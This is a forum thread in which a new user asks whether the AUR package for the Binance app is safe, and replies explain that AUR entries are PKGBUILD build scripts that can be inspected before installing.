Are packages in the aur safe in the sense that they can't steal your password or something?

hello.

i’m trying to install the binance trading app on my system. the official downloads only have the deb and rpm formats, but it’s in the aur. is the aur version safe in the sense that it won’t steal passwords or something? you know since my money is in there lol.

“Packages” in the AUR are not pre-compiled packages, per se.

What you get are “instructions” for a AUR helper (such as pamac or yay) to download, build, and install a package not in the official repositories.

You can examine a package for security by going to the package on aur.archlinux.org (AUR (en) - binance) and looking at the PKGBUILD.

In the case of binance, the PKGBBUILD downloads the deb version of the software and repackages it into a Arch/Manjaro package.

5 Likes

Welcome to the forum! :wink:

First of all, there aren’t actually any packages on the AUR itself. It’s a repository with build scripts, and those scripts ─ specifically, the PKGBUILD file ─ pull in the actual source code packages (or binary packages if applicable) from wherever those are stored. So when it comes to the AUR, you can always look at the PKGBUILD file and check what it pulls in, and from where it pulls in those things.

Now, secondly, it has in the past happened that people who had upload access to the AUR were uploading corrupted packages ─ i.e. the PKGBUILD would pull in malware. Sometimes that was by accident ─ because the uploader hadn’t actually verified what they were linking to ─ and other times it was malicious, e.g. through a hacked AUR account. But in such case, the community quickly discovers such malpractice and will report it, and then the packages in question will be removed and the account of the uploader will be blocked.

So the general rule when it comes to the AUR is “Practise discernment, check the PKGBUILD, and be responsible.” But in practice, and for most part, one could say that the AUR is fairly trustworthy.

10 Likes

tl;dr
If the PKGBUILD pulls either the (actual) source, RPM or DEB package, and doesn’t do anything out of ordinary with it, it’s as safe as the original. Is the original safe?

5 Likes

How to link please because I am a newb

When downloading or installing AUR packages, you will be asked whether you want to inspect the PKGBUILD. It’s a human-readable script.

This topic was automatically closed 15 days after the last reply. New replies are no longer allowed.